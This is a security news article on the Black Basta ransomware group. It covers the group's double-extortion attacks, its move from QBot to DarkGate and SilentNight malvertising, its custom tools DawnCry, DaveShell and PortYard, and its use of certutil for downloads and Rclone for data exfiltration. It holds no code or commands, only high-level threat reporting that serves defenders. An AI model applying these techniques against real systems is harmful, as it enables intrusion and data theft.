Black Basta Ransomware Group Adapts with Custom Tools and Malware

July 30, 2024

The ransomware group Black Basta has demonstrated its adaptability and resilience in the face of an ever-changing landscape. Active since April 2022, the group has successfully attacked over 500 companies globally. The group employs a double-extortion strategy, stealing and encrypting data, and demanding large ransoms often in the millions. Previously, Black Basta partnered with the QBot botnet to penetrate corporate networks. However, following the disruption of the QBot botnet by law enforcement, the group had to seek new alliances.

Cybersecurity firm Mandiant, which tracks the group under the identifier UNC4393, has detected the use of new malware and tools in Black Basta's intrusions. This highlights the group's ability to evolve and remain operational. The group has been particularly active this year, compromising high-profile entities such as Veolia North America, Hyundai Motor Europe, and Keytronic. The group's sophistication is evident in its access to zero-day vulnerability exploits, including Windows privilege elevation (2024-26169) and VMware ESXi authentication bypass flaws (CVE-2024-37085).

After the takedown of the QBot infrastructure by the FBI and DOJ in late 2023, Black Basta turned to other initial access distribution clusters, most notably those delivering DarkGate malware. The group later shifted to using SilentNight, a flexible backdoor malware delivered via malvertising. This marked a significant move away from phishing as their primary method of initial access.

Mandiant has observed Black Basta's gradual transition from using publicly available tools to developing and deploying its own custom malware. In early 2024, UNC4393 was seen deploying a custom memory-only dropper named DawnCry. This dropper initiated a multi-stage infection, followed by DaveShell, which ultimately led to the PortYard tunneler. PortYard, another custom tool, establishes connections to Black Basta's command and control (C2) infrastructure and proxies traffic.

In addition to the above, Black Basta continues to use 'living off the land' binaries and readily available tools in its latest attacks, including the Windows certutil command-line utility to download SilentNight and the Rclone tool to exfiltrate data. Despite the challenges, Black Basta remains a significant global threat and a leading actor in the ransomware landscape.

Related News

Latest News

Like what you see?

Get a digest of headlines, vulnerabilities, risk context, and more delivered to your inbox.

Subscribe Below

By submitting this form, you’re giving us permission to email you. You may unsubscribe at any time.

Accelerate Security Teams

Continuously identify and prioritize the risks that are most critical in your environment, and validate that your remediation efforts are reducing risk. An always-on single source-of-truth of your assets, services, and vulnerabilities.